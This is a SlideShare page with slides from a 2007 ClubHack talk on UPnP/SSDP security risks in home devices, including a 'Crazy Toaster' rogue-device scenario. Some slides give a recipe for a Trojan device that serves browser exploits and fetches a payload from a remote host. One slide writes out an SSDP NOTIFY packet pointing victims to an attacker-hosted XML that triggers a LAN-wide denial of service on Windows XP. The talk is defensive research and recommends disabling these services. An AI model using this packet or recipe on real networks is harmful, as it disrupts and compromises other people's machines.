Abstract image of a woman sitting on books and studying on a laptop

Dror-Crazy_toaster

Download as PPT, PDF
G
guest66dc5f

The document discusses potential security issues with connected home devices and proposes a scenario called "Crazy Toaster" where a toaster or other networked appliance could be hacked to join a local network and become a security threat. It outlines steps to create a "Crazy Toaster Trojan" using UPnP and describes demonstrations of the SSDP denial of service vulnerability on Windows XP networks. The document concludes by discussing future hacking ideas and risks of interconnected devices and embedded systems.

Technology
1 of 28
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
“ A Crazy Toaster : Can Home Devices turn against us?” Dror Shalev SmartDefense Research Center [email_address] ClubHack, 9/12/2007, Puna , India India's own International Hackers Convention
 
Agenda Introduction Trust, technology and new privacy issues Overview of home networking and early threats   Steps to create a Crazy Toaster Trojan Demonstration Side effect : Windows XP SSDP distributed Dos Side effect Demonstration TODO, Extended ideas iPhone , iToaster & others (ClubHack edition) Respect Q&A
Introduction
Introduction Mission: World domination via single UDP packet  Do we care if our home Toaster sees us Naked? Can Home Devices turn against us, spy on our Network? Privacy and trust issues raised by technology, New hardware & Cool devices
Trust, technology & privacy issues Common privacy issues: Technology is about to replace the trust model we use today People get confused between people that know things and machines that know things Do we care if Google machines know that we would like to pay for porn? Does this information can be given to a human? Trust models: Usually we don’t trust a human in 100% to be able to deal with his knowledge about us Should we trust corporations like Google? Should we trust hardware and software vendors?
Overview of home networking Home networking in Windows XP and in Windows Vista Peer-to-peer networking of PCs, networked appliances and wireless devices UPnP architecture UPnP ,Overview of a distributed, open architecture based on TCP/IP, UDP and HTTP IPv6 – Reintroduce old exploits ( land attack MS06-064) Security exploits and early threats
In Vista’s Network Explorer (the replacement to XP’s Network Neighborhood), devices are discovered using function discovery Function discovery can find devices using much more efficient, diverse and robust protocols than were available in XP’s Network Neighborhood These protocols include NetBios, UPnP/SSDP, and Web Services Discovery (WSD) Overview of home networking
Home networking in Windows Vista Windows Peer-to-Peer Networking People Near Me (PNM) Network discovery Media sharing Overview of home networking
Overview of home networking
Overview of home networking Wireless Connectivity Wireless Access Point Low-end Appliance VoIP Webpage with virus Cell phone Crazy Toaster Media Center Hacker
Universal Plug and Play (UPnP) The UPnP architecture is a distributed, open networking architecture that leverages TCP/IP and the Web to enable seamless proximity networking in addition to control and data transfer among networked devices in the home, office, and everywhere in between What are the benefits of UPnP technology? Media and device independence. UPnP technology can run on any network technology including Wi-Fi, coax, phone line, power line, Ethernet and 1394. Platform independence. Vendors can use any operating system and any programming language to build UPnP products. Internet-based technologies. UPnP technology is built upon IP, TCP, UDP, HTTP, and XML, among others. UI Control. UPnP architecture enables vendor control over device user interface and interaction using the browser. Programmatic control. UPnP architecture enables conventional application programmatic control. Common base protocols. Vendors agree on base protocol sets on a per-device basis. Extendable. Each UPnP product can have value-added services layered on top of the basic device architecture by the individual manufacturers.
UPnP, IGDs, SSDP on XP UPnP is a collection of standards and protocols that permits Windows to provide discovery and interoperability between a wide variety of Universal Plug and Play network devices When connected to a network, UPnP devices immediately provide their services and use other services on the network Such devices may include anything from standard computing equipment to kitchen appliances and home entertainment systems By default, the UPnP client is not installed The Internet Gateway Device Discovery and Control Client permits Windows to detect and interact with Internet gateway devices (IGDs) IGDs include routers and computers running Internet Connection Sharing. Such devices can support detection by either UPnP or the Internet Gateway Device Discovery and Control Client IDG devices use the Simple Service Discovery Protocol (SSDP) to broadcast their availability on the network This permits clients to automatically locate the IDG device and use the device as their default gateway for external network access By default, the Internet Gateway Device Discovery and Control Client is installed
Simple Service Discovery Protocol (SSDP) Retrieving Device and Service Descriptions On a default XP installation, no support is added for device control, as it would be the case in an installation of UPNP from "Network Services“ Although Microsoft added default support for an "InternetGatewayDevice", that was added to aid leading network hardware manufactures in making UPnP enabled "gateway devices" Desktop Wireless Access Point
Early threats   Vulnerability Date Severity Credit Apple Mac OS X mDNSResponder Remote Buffer Overflow 2007-05-24 High Michael Lynn, Juniper Microsoft Windows UPnP Remote Stack Buffer Overflow [MS07-019] 2007-04-10 Critical Greg MacManus, iDefense Linksys WRT54GX V2.0 WAN Port UPnP 2006-10-11 Mid Armijn Hemel Multiple D-Link Routers UPNP Buffer Overflow 2006-07-24 High Barnaby Jack , eEye Microsoft Windows Plug and Play Vulnerability / Zotob worm [MS05-039] 2005-08-05 Critical Neel Mehta ,ISS X-Force Belkin 54G Wireless Router Multiple Vulnerabilities 2005-03-17 Mid pureone Multiple Linksys Routers Gozila.CGI Denial Of Service 2004-06-02 Mid Alan McCaig , b0f Xavi DSL Router UPNP Long Request Denial Of Service 2003-07-22 Mid David F. Madrid Netgear FM114P ProSafe Wireless Router Rule Bypass 2003-04-02 High Björn Stickler Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure 2003-04-02 Mid Björn Stickler Netgear FM114P Wireless Firewall File Disclosure 2003-02-09 Mid Björn Stickler Multiple Linksys Devices strcat() Buffer Overflow 2002-12-02 High Gerardo Richarte , CORE Linksys Router Unauthorized Management Access 2002-11-17 Mid Seth Bromberger Microsoft UPnP NOTIFY Buffer Overflow [MS01-059] 2001-12-19 Critical Riley Hassell, eEye Microsoft Universal Plug and Play Simple Service Discovery Protocol Dos 2001-12-19 Mid Riley Hassell, eEye Microsoft UPnP Denial of Service 2001-10-31 Low 'Ken' from FTU Windows ME Simple Service Discovery Protocol Denial of Service 2001-10-17 Mid milo omega
Steps to create a Crazy Toaster Trojan While researching SSDP & UPnP we realized that protocols allow not only routers, media players, servers and other devices to connect seamlessly but also to attackers A scenario of “Crazy Toaster ” , Trojan device , or software with TCP/IP capabilities like Routers , Media Players , Access Points , that join Local area network and become security hazard is possible
Steps to create a Crazy Toaster Trojan Recipe : Building your own Trojan Needed Ingredients Toaster Hardware :Any or none Software : Select an UPnP Stack vendor sample ( Intel ,Siemens) Network Access to the victim’s network (worm victim, multicast , social engineering ,physical access ) Problems Heat Linux 2 Nokia IPSO porting Shipping
Steps to create a Crazy Toaster Trojan Our Crazy Toaster will advertise its presence on victim local network Trojan Discovery process uses : HTTPU (HTTP over UDP) HTTPMU for UDP multicast ,to 239.255.255.250:1900   Sends HTTP packets to multiple (multicast) systems over UDP Social engineering : declare as anything from standard computing equipment to kitchen appliances and home entertainment systems Presentation web server JavaScript , Ajax & browser bugs Use known techniques & exploits from the wild ( MPack ) Retrieve attack payload from remote host
Steps to create a Crazy Toaster Trojan
Demonstration Physical run of “Crazy Toaster” Trojan attack Physical run of advanced attack vectors: Discovery Presentation Social engineering Browser exploits Nokia IPSO 6 hardware Posix / Win sdk Crazy Toaster Demo
Windows XP SSDP distributed Dos Side effect : Windows XP Simple Service Discovery Protocol Distributed Denial of Service Vulnerability  Single multicast UDP packet cause XP victims to Parse well formatted xml document  recursive logic Bomb Memory Consumption – 100% CPU on entire lan segment Virtual memory page file going crazy Can be done via software ( spyware , worm ) Distributed damage and possible attack vectors A remote attacker that resides on the lan segment connected to the affected appliance/ Trojan may exploit this vulnerability to deny service for all legitimate lan users * MS will fix this in service pack 3 for XP
Windows XP SSDP distributed Dos NOTIFY * HTTP/1.1  HOST: 239.255.255.250:1900   CACHE-CONTROL: max-age=9  LOCATION: http://AttackerInLanHost/upnp/trojan/ilya.xml NT: urn: schemas-upnp-org:device:InternetGatewayDevice:1   NTS: ssdp:alive  SERVER: Drors/2005 UPnP/1.0 SVCHostDLLkiller/1.1  USN: uuid:CrazyToasterByDrorRespect2eEye Xml Kill Crazy Toaster Victim
Side effect Demonstration Kitchen appliance in smart home become Crazy Physical run of Windows XP Simple Service Discovery Protocol Distrusted Denial of Service Vulnerability Logic Bomb discovery in wired or wireless local network   Demo Kill xml
Cheap hardware appliances open a door for “bad guys” Wireless Hardware & IPV6 opens new ball game Trust no one (hardware & software vendors , free gifts) Home devices can be target to remote attacks (Buffer overflows, CSRF, XSS ) The SSDP Discovery Service and Universal Plug and Play Host service should both be set to disabled In Vista, disable ‘Network discovery’ Can Home Devices turn against us? Oh yeah, Home Devices are as bad as their software authors Conclusions
TODO, Extended ideas Arp poisoning , kernel bugs Wireless hacking, WEP cracking, Linux embedded systems , MIPS Cell phone hacking , GPS , IPhone Media centers , Game consoles DivX worm , Copy Rights Bomb Record sound , IP hidden Cam IPV6
iPhone , iToaster & Others Apple’s iPhone is a fine hardware (Wi-Fi, GSM, linux) ARM-based processor ,with iPhone's version of OS X Linux 2 OS X freeBSD porting, jailbreak firmware 1.0.2 Bonjour ,mDNSResponder , UDP port 5353 Multicast DNS s iDemo
Respect ClubHack : India's own International Hackers' Convention UPnP™ Forum HackTheToaster.com eEye Project Cowbird , $30, 30 Minutes, 30 Networks Exploiting embedded systems ,Barnaby Jack UPnP Stack Vendors , Intel UPnP , CyberLink , Siemens AG OSGI alliance Dog's Toaster Defcon 9 UPnP Hacks
Q&A Q: Why hack a toaster? A: Why not? * Slides ,Toaster and iToaster sources code : http://www.drorshalev.com/dev/upnp/

More Related Content

PDF
Wireless security
Aurobindo Nayak
 
PPT
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
CODE BLUE
 
PDF
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 
PDF
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Zoltan Balazs
 
PPT
Anton Chuvakin on Honeypots
Anton Chuvakin
 
PDF
Research Inventy : International Journal of Engineering and Science
inventy
 
PPTX
[2.2] Hacking Internet of Things devices - Ivan Novikov
OWASP Russia
 
PDF
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Duo Security
 
Wireless security
Aurobindo Nayak
 
Wireless security testing with attack by Keiichi Horiai - CODE BLUE 2015
CODE BLUE
 
IoT security is a nightmare. But what is the real risk?
Zoltan Balazs
 
Hacktivity 2016: The real risks of the IoT security-nightmare: Hacking IP cam...
Zoltan Balazs
 
Anton Chuvakin on Honeypots
Anton Chuvakin
 
Research Inventy : International Journal of Engineering and Science
inventy
 
[2.2] Hacking Internet of Things devices - Ivan Novikov
OWASP Russia
 
Internet of Fails: Where IoT Has Gone Wrong and How We're Making it Right by ...
Duo Security
 

What's hot (20)

PDF
Let's Hack a House
Synack
 
PDF
Defcon 2011 - Penetration Testing Over Powerlines
Michael Smith
 
PPTX
Holland safenet livehack hid usb pineapple_cain_oph_with_video
robbuddingh
 
PDF
Intro to firewalls
Joshua Johnston
 
PDF
Ceh v8 labs module 15 hacking wireless networks
Mehrdad Jingoism
 
PDF
Deep Learning Based Real-Time DNS DDoS Detection System
Seungjoo Kim
 
PDF
How the CC Harmonizes with Secure Software Development Lifecycle
Seungjoo Kim
 
PDF
Fundamentals of network hacking
Pranshu Pareek
 
PPTX
WiFi Hotspot-Wireless Router
Wispot
 
DOCX
Technical Report
stuartsearles
 
PDF
Defcon 22-weston-hecker-burner-phone-ddos
Priyanka Aash
 
PPTX
Hacker bootcamp
Gregory Hanis
 
PPTX
PLNOG15: Simplifying network deployment using Autonomic networking and Plug-a...
PROIDEA
 
PDF
Hack wifi password using kali linux
Helder Oliveira
 
PDF
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Priyanka Aash
 
PDF
DDoS Attack on DNS using infected IoT Devices
Seungjoo Kim
 
PPTX
Exploiting WiFi Security
Hariraj Rathod
 
PPTX
Packet sniffers
Kunal Thakur
 
PDF
OWASP Cambridge Chapter Meeting 13/12/2016
joebursell
 
PPT
Operating System Fingerprinting Prevention
dcalhoun1984
 
Let's Hack a House
Synack
 
Defcon 2011 - Penetration Testing Over Powerlines
Michael Smith
 
Holland safenet livehack hid usb pineapple_cain_oph_with_video
robbuddingh
 
Intro to firewalls
Joshua Johnston
 
Ceh v8 labs module 15 hacking wireless networks
Mehrdad Jingoism
 
Deep Learning Based Real-Time DNS DDoS Detection System
Seungjoo Kim
 
How the CC Harmonizes with Secure Software Development Lifecycle
Seungjoo Kim
 
Fundamentals of network hacking
Pranshu Pareek
 
WiFi Hotspot-Wireless Router
Wispot
 
Technical Report
stuartsearles
 
Defcon 22-weston-hecker-burner-phone-ddos
Priyanka Aash
 
Hacker bootcamp
Gregory Hanis
 
PLNOG15: Simplifying network deployment using Autonomic networking and Plug-a...
PROIDEA
 
Hack wifi password using kali linux
Helder Oliveira
 
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Priyanka Aash
 
DDoS Attack on DNS using infected IoT Devices
Seungjoo Kim
 
Exploiting WiFi Security
Hariraj Rathod
 
Packet sniffers
Kunal Thakur
 
OWASP Cambridge Chapter Meeting 13/12/2016
joebursell
 
Operating System Fingerprinting Prevention
dcalhoun1984
 
Ad

Viewers also liked (6)

PDF
M1 teacherslides
Rakesh Bethi
 
PPT
The kettle and the toaster story
Maha Hussain
 
RTF
Assigment 1- Concept writing updated
sowmya kapadia
 
PPTX
Technology of a Toaster _ materials
SiempreParaTi
 
PDF
11 Heat Transfer
spsu
 
PDF
Smart TV Insecurity
Positive Hack Days
 
M1 teacherslides
Rakesh Bethi
 
The kettle and the toaster story
Maha Hussain
 
Assigment 1- Concept writing updated
sowmya kapadia
 
Technology of a Toaster _ materials
SiempreParaTi
 
11 Heat Transfer
spsu
 
Smart TV Insecurity
Positive Hack Days
 
Ad

Similar to Dror-Crazy_toaster (20)

PDF
Martin Zeiser, Universal Pwn n Play - pacsec -final
PacSecJP
 
PPT
Download It
webhostingguy
 
PDF
U Plug, We Play - NED Summit. Cork, Ireland
DTM Security
 
PDF
Avast @ Machine Learning
Avast
 
PDF
UpnP in Digital Home Networking
QuEST Global (erstwhile NeST Software)
 
PDF
DEF CON 23 - Rickey Lawshae - lets talk about soap
Felipe Prado
 
PDF
From Home Enabled Personal Media To Instant Personal Media Sharing
guest829cce0
 
PDF
CSI - Poor Mans Guide To Espionage Gear
shawn_merdinger
 
PPTX
Devices and gateways
Nikil S Raaju
 
PPTX
UTM - The Complete Security Box
Sophos
 
PDF
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
Security Weekly
 
PDF
$HOME Sweet $HOME SANSFIRE Edition
Xavier Mertens
 
PPT
Let's Talk About SOAP, Baby. Let's Talk About UPnP.
HeadlessZeke
 
PPTX
SmartTV Security
Ulisses Albuquerque
 
PDF
Rapid7 Report: Security Flaws in Universal Plug and Play: Unplug, Don't Play.
Rapid7
 
PDF
Security flawsu pnp
losalamos
 
PDF
Extending UPnP for Application Interoperability in a Home Network
IJECEIAES
 
PDF
Telesemana ce nominum:mef
Rafael Junquera
 
PDF
Luiz eduardo. introduction to mobile snitch
Yury Chemerkin
 
PPTX
Cloud Security Topics: Network Intrusion Detection for Amazon EC2
Alert Logic
 
Martin Zeiser, Universal Pwn n Play - pacsec -final
PacSecJP
 
Download It
webhostingguy
 
U Plug, We Play - NED Summit. Cork, Ireland
DTM Security
 
Avast @ Machine Learning
Avast
 
UpnP in Digital Home Networking
QuEST Global (erstwhile NeST Software)
 
DEF CON 23 - Rickey Lawshae - lets talk about soap
Felipe Prado
 
From Home Enabled Personal Media To Instant Personal Media Sharing
guest829cce0
 
CSI - Poor Mans Guide To Espionage Gear
shawn_merdinger
 
Devices and gateways
Nikil S Raaju
 
UTM - The Complete Security Box
Sophos
 
The Internet Of Insecure Things: 10 Most Wanted List - Derbycon 2014
Security Weekly
 
$HOME Sweet $HOME SANSFIRE Edition
Xavier Mertens
 
Let's Talk About SOAP, Baby. Let's Talk About UPnP.
HeadlessZeke
 
SmartTV Security
Ulisses Albuquerque
 
Rapid7 Report: Security Flaws in Universal Plug and Play: Unplug, Don't Play.
Rapid7
 
Security flawsu pnp
losalamos
 
Extending UPnP for Application Interoperability in a Home Network
IJECEIAES
 
Telesemana ce nominum:mef
Rafael Junquera
 
Luiz eduardo. introduction to mobile snitch
Yury Chemerkin
 
Cloud Security Topics: Network Intrusion Detection for Amazon EC2
Alert Logic
 

More from guest66dc5f (20)

PPT
Os Timed Original
guest66dc5f
 
PPT
Control your entire house with your iPhone
guest66dc5f
 
PPT
Awesome car collection
guest66dc5f
 
PPT
Freaky car number plates
guest66dc5f
 
PDF
David-FPGA
guest66dc5f
 
PPT
Sunil-Hacking_firefox
guest66dc5f
 
PDF
Rahul-Analysis_of_Adversarial_Code
guest66dc5f
 
PPT
Chetan-Mining_Digital_Evidence_in_Microsoft_Windows
guest66dc5f
 
PDF
WHITEPAPER-7_years_of_Indian_Cyber_Law
guest66dc5f
 
PPT
Rohas-7_years_of_indian_cyber_laws
guest66dc5f
 
PDF
David-FPGA
guest66dc5f
 
PDF
Shreeraj-Hacking_Web_2
guest66dc5f
 
PDF
Ajit-Legiment_Techniques
guest66dc5f
 
PPT
Varun-Subtle_Security_flaws
guest66dc5f
 
PPT
CostofWarinIraq
guest66dc5f
 
PDF
NR-golf-sept07
guest66dc5f
 
PDF
NR-golf-sept07
guest66dc5f
 
PDF
golf
guest66dc5f
 
PDF
longisland_golf_07
guest66dc5f
 
PDF
GolfLakeCity_002
guest66dc5f
 
Os Timed Original
guest66dc5f
 
Control your entire house with your iPhone
guest66dc5f
 
Awesome car collection
guest66dc5f
 
Freaky car number plates
guest66dc5f
 
David-FPGA
guest66dc5f
 
Sunil-Hacking_firefox
guest66dc5f
 
Rahul-Analysis_of_Adversarial_Code
guest66dc5f
 
Chetan-Mining_Digital_Evidence_in_Microsoft_Windows
guest66dc5f
 
WHITEPAPER-7_years_of_Indian_Cyber_Law
guest66dc5f
 
Rohas-7_years_of_indian_cyber_laws
guest66dc5f
 
David-FPGA
guest66dc5f
 
Shreeraj-Hacking_Web_2
guest66dc5f
 
Ajit-Legiment_Techniques
guest66dc5f
 
Varun-Subtle_Security_flaws
guest66dc5f
 
CostofWarinIraq
guest66dc5f
 
NR-golf-sept07
guest66dc5f
 
NR-golf-sept07
guest66dc5f
 
golf
guest66dc5f
 
longisland_golf_07
guest66dc5f
 
GolfLakeCity_002
guest66dc5f
 

Recently uploaded (20)

PDF
DASA ADMISSION 2024_FirstRound_FirstRank_LastRank.pdf
rameswartudu05
 
PDF
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDCA Consulting
 
PDF
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
PDF
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
PDF
CloudStack 4.21: First Look Webinar slides
ShapeBlue
 
PPT
What is a Computer? Input Devices /output devices
GulJan8
 
PDF
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
PPTX
Benefits of Physical activity for teenagers.pptx
Nokwanda Thabethe
 
PDF
How ambidextrous entrepreneurial leaders react to the artificial intelligence...
IAESIJAI
 
PDF
1 - Historical Antecedents, Social Consideration.pdf
tuazon2030627
 
PPTX
Web Crawler for Trend Tracking Gen Z Insights.pptx
Actowiz Solustions
 
PDF
A review of recent deep learning applications in wood surface defect identifi...
IAESIJAI
 
PDF
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
PDF
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
PDF
NewMind AI Weekly Chronicles – August ’25 Week III
NewMind AI
 
PPTX
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
PDF
A Late Bloomer's Guide to GenAI: Ethics, Bias, and Effective Prompting - Boha...
Mindy Bohannon
 
PDF
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
PDF
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
PDF
TrustArc Webinar - Click, Consent, Trust: Winning the Privacy Game
TrustArc
 
DASA ADMISSION 2024_FirstRound_FirstRank_LastRank.pdf
rameswartudu05
 
Transform Your ITIL® 4 & ITSM Strategy with AI in 2025.pdf
PDCA Consulting
 
WOOl fibre morphology and structure.pdf for textiles
Rajendrakumar868651
 
Getting started with AI Agents and Multi-Agent Systems
Maxim Salnikov
 
CloudStack 4.21: First Look Webinar slides
ShapeBlue
 
What is a Computer? Input Devices /output devices
GulJan8
 
Zenith AI: Advanced Artificial Intelligence
Biz Preneurs
 
Benefits of Physical activity for teenagers.pptx
Nokwanda Thabethe
 
How ambidextrous entrepreneurial leaders react to the artificial intelligence...
IAESIJAI
 
1 - Historical Antecedents, Social Consideration.pdf
tuazon2030627
 
Web Crawler for Trend Tracking Gen Z Insights.pptx
Actowiz Solustions
 
A review of recent deep learning applications in wood surface defect identifi...
IAESIJAI
 
Microsoft Solutions Partner Drive Digital Transformation with D365.pdf
Microsoft Dynamics
 
A comparative study of natural language inference in Swahili using monolingua...
IAESIJAI
 
NewMind AI Weekly Chronicles – August ’25 Week III
NewMind AI
 
Group 1 Presentation -Planning and Decision Making .pptx
MatthewLewis227954
 
A Late Bloomer's Guide to GenAI: Ethics, Bias, and Effective Prompting - Boha...
Mindy Bohannon
 
Assigned Numbers - 2025 - Bluetooth® Document
Bloombase
 
Video forgery: An extensive analysis of inter-and intra-frame manipulation al...
IAESIJAI
 
TrustArc Webinar - Click, Consent, Trust: Winning the Privacy Game
TrustArc
 

Dror-Crazy_toaster

  • 1. “ A Crazy Toaster : Can Home Devices turn against us?” Dror Shalev SmartDefense Research Center [email_address] ClubHack, 9/12/2007, Puna , India India's own International Hackers Convention
  • 2.  
  • 3. Agenda Introduction Trust, technology and new privacy issues Overview of home networking and early threats   Steps to create a Crazy Toaster Trojan Demonstration Side effect : Windows XP SSDP distributed Dos Side effect Demonstration TODO, Extended ideas iPhone , iToaster & others (ClubHack edition) Respect Q&A
  • 5. Introduction Mission: World domination via single UDP packet  Do we care if our home Toaster sees us Naked? Can Home Devices turn against us, spy on our Network? Privacy and trust issues raised by technology, New hardware & Cool devices
  • 6. Trust, technology & privacy issues Common privacy issues: Technology is about to replace the trust model we use today People get confused between people that know things and machines that know things Do we care if Google machines know that we would like to pay for porn? Does this information can be given to a human? Trust models: Usually we don’t trust a human in 100% to be able to deal with his knowledge about us Should we trust corporations like Google? Should we trust hardware and software vendors?
  • 7. Overview of home networking Home networking in Windows XP and in Windows Vista Peer-to-peer networking of PCs, networked appliances and wireless devices UPnP architecture UPnP ,Overview of a distributed, open architecture based on TCP/IP, UDP and HTTP IPv6 – Reintroduce old exploits ( land attack MS06-064) Security exploits and early threats
  • 8. In Vista’s Network Explorer (the replacement to XP’s Network Neighborhood), devices are discovered using function discovery Function discovery can find devices using much more efficient, diverse and robust protocols than were available in XP’s Network Neighborhood These protocols include NetBios, UPnP/SSDP, and Web Services Discovery (WSD) Overview of home networking
  • 9. Home networking in Windows Vista Windows Peer-to-Peer Networking People Near Me (PNM) Network discovery Media sharing Overview of home networking
  • 10. Overview of home networking
  • 11. Overview of home networking Wireless Connectivity Wireless Access Point Low-end Appliance VoIP Webpage with virus Cell phone Crazy Toaster Media Center Hacker
  • 12. Universal Plug and Play (UPnP) The UPnP architecture is a distributed, open networking architecture that leverages TCP/IP and the Web to enable seamless proximity networking in addition to control and data transfer among networked devices in the home, office, and everywhere in between What are the benefits of UPnP technology? Media and device independence. UPnP technology can run on any network technology including Wi-Fi, coax, phone line, power line, Ethernet and 1394. Platform independence. Vendors can use any operating system and any programming language to build UPnP products. Internet-based technologies. UPnP technology is built upon IP, TCP, UDP, HTTP, and XML, among others. UI Control. UPnP architecture enables vendor control over device user interface and interaction using the browser. Programmatic control. UPnP architecture enables conventional application programmatic control. Common base protocols. Vendors agree on base protocol sets on a per-device basis. Extendable. Each UPnP product can have value-added services layered on top of the basic device architecture by the individual manufacturers.
  • 13. UPnP, IGDs, SSDP on XP UPnP is a collection of standards and protocols that permits Windows to provide discovery and interoperability between a wide variety of Universal Plug and Play network devices When connected to a network, UPnP devices immediately provide their services and use other services on the network Such devices may include anything from standard computing equipment to kitchen appliances and home entertainment systems By default, the UPnP client is not installed The Internet Gateway Device Discovery and Control Client permits Windows to detect and interact with Internet gateway devices (IGDs) IGDs include routers and computers running Internet Connection Sharing. Such devices can support detection by either UPnP or the Internet Gateway Device Discovery and Control Client IDG devices use the Simple Service Discovery Protocol (SSDP) to broadcast their availability on the network This permits clients to automatically locate the IDG device and use the device as their default gateway for external network access By default, the Internet Gateway Device Discovery and Control Client is installed
  • 14. Simple Service Discovery Protocol (SSDP) Retrieving Device and Service Descriptions On a default XP installation, no support is added for device control, as it would be the case in an installation of UPNP from "Network Services“ Although Microsoft added default support for an "InternetGatewayDevice", that was added to aid leading network hardware manufactures in making UPnP enabled "gateway devices" Desktop Wireless Access Point
  • 15. Early threats   Vulnerability Date Severity Credit Apple Mac OS X mDNSResponder Remote Buffer Overflow 2007-05-24 High Michael Lynn, Juniper Microsoft Windows UPnP Remote Stack Buffer Overflow [MS07-019] 2007-04-10 Critical Greg MacManus, iDefense Linksys WRT54GX V2.0 WAN Port UPnP 2006-10-11 Mid Armijn Hemel Multiple D-Link Routers UPNP Buffer Overflow 2006-07-24 High Barnaby Jack , eEye Microsoft Windows Plug and Play Vulnerability / Zotob worm [MS05-039] 2005-08-05 Critical Neel Mehta ,ISS X-Force Belkin 54G Wireless Router Multiple Vulnerabilities 2005-03-17 Mid pureone Multiple Linksys Routers Gozila.CGI Denial Of Service 2004-06-02 Mid Alan McCaig , b0f Xavi DSL Router UPNP Long Request Denial Of Service 2003-07-22 Mid David F. Madrid Netgear FM114P ProSafe Wireless Router Rule Bypass 2003-04-02 High Björn Stickler Netgear FM114P ProSafe Wireless Router UPnP Information Disclosure 2003-04-02 Mid Björn Stickler Netgear FM114P Wireless Firewall File Disclosure 2003-02-09 Mid Björn Stickler Multiple Linksys Devices strcat() Buffer Overflow 2002-12-02 High Gerardo Richarte , CORE Linksys Router Unauthorized Management Access 2002-11-17 Mid Seth Bromberger Microsoft UPnP NOTIFY Buffer Overflow [MS01-059] 2001-12-19 Critical Riley Hassell, eEye Microsoft Universal Plug and Play Simple Service Discovery Protocol Dos 2001-12-19 Mid Riley Hassell, eEye Microsoft UPnP Denial of Service 2001-10-31 Low 'Ken' from FTU Windows ME Simple Service Discovery Protocol Denial of Service 2001-10-17 Mid milo omega
  • 16. Steps to create a Crazy Toaster Trojan While researching SSDP & UPnP we realized that protocols allow not only routers, media players, servers and other devices to connect seamlessly but also to attackers A scenario of “Crazy Toaster ” , Trojan device , or software with TCP/IP capabilities like Routers , Media Players , Access Points , that join Local area network and become security hazard is possible
  • 17. Steps to create a Crazy Toaster Trojan Recipe : Building your own Trojan Needed Ingredients Toaster Hardware :Any or none Software : Select an UPnP Stack vendor sample ( Intel ,Siemens) Network Access to the victim’s network (worm victim, multicast , social engineering ,physical access ) Problems Heat Linux 2 Nokia IPSO porting Shipping
  • 18. Steps to create a Crazy Toaster Trojan Our Crazy Toaster will advertise its presence on victim local network Trojan Discovery process uses : HTTPU (HTTP over UDP) HTTPMU for UDP multicast ,to 239.255.255.250:1900   Sends HTTP packets to multiple (multicast) systems over UDP Social engineering : declare as anything from standard computing equipment to kitchen appliances and home entertainment systems Presentation web server JavaScript , Ajax & browser bugs Use known techniques & exploits from the wild ( MPack ) Retrieve attack payload from remote host
  • 19. Steps to create a Crazy Toaster Trojan
  • 20. Demonstration Physical run of “Crazy Toaster” Trojan attack Physical run of advanced attack vectors: Discovery Presentation Social engineering Browser exploits Nokia IPSO 6 hardware Posix / Win sdk Crazy Toaster Demo
  • 21. Windows XP SSDP distributed Dos Side effect : Windows XP Simple Service Discovery Protocol Distributed Denial of Service Vulnerability  Single multicast UDP packet cause XP victims to Parse well formatted xml document  recursive logic Bomb Memory Consumption – 100% CPU on entire lan segment Virtual memory page file going crazy Can be done via software ( spyware , worm ) Distributed damage and possible attack vectors A remote attacker that resides on the lan segment connected to the affected appliance/ Trojan may exploit this vulnerability to deny service for all legitimate lan users * MS will fix this in service pack 3 for XP
  • 22. Windows XP SSDP distributed Dos NOTIFY * HTTP/1.1  HOST: 239.255.255.250:1900   CACHE-CONTROL: max-age=9  LOCATION: http://AttackerInLanHost/upnp/trojan/ilya.xml NT: urn: schemas-upnp-org:device:InternetGatewayDevice:1   NTS: ssdp:alive  SERVER: Drors/2005 UPnP/1.0 SVCHostDLLkiller/1.1  USN: uuid:CrazyToasterByDrorRespect2eEye Xml Kill Crazy Toaster Victim
  • 23. Side effect Demonstration Kitchen appliance in smart home become Crazy Physical run of Windows XP Simple Service Discovery Protocol Distrusted Denial of Service Vulnerability Logic Bomb discovery in wired or wireless local network   Demo Kill xml
  • 24. Cheap hardware appliances open a door for “bad guys” Wireless Hardware & IPV6 opens new ball game Trust no one (hardware & software vendors , free gifts) Home devices can be target to remote attacks (Buffer overflows, CSRF, XSS ) The SSDP Discovery Service and Universal Plug and Play Host service should both be set to disabled In Vista, disable ‘Network discovery’ Can Home Devices turn against us? Oh yeah, Home Devices are as bad as their software authors Conclusions
  • 25. TODO, Extended ideas Arp poisoning , kernel bugs Wireless hacking, WEP cracking, Linux embedded systems , MIPS Cell phone hacking , GPS , IPhone Media centers , Game consoles DivX worm , Copy Rights Bomb Record sound , IP hidden Cam IPV6
  • 26. iPhone , iToaster & Others Apple’s iPhone is a fine hardware (Wi-Fi, GSM, linux) ARM-based processor ,with iPhone's version of OS X Linux 2 OS X freeBSD porting, jailbreak firmware 1.0.2 Bonjour ,mDNSResponder , UDP port 5353 Multicast DNS s iDemo
  • 27. Respect ClubHack : India's own International Hackers' Convention UPnP™ Forum HackTheToaster.com eEye Project Cowbird , $30, 30 Minutes, 30 Networks Exploiting embedded systems ,Barnaby Jack UPnP Stack Vendors , Intel UPnP , CyberLink , Siemens AG OSGI alliance Dog's Toaster Defcon 9 UPnP Hacks
  • 28. Q&A Q: Why hack a toaster? A: Why not? * Slides ,Toaster and iToaster sources code : http://www.drorshalev.com/dev/upnp/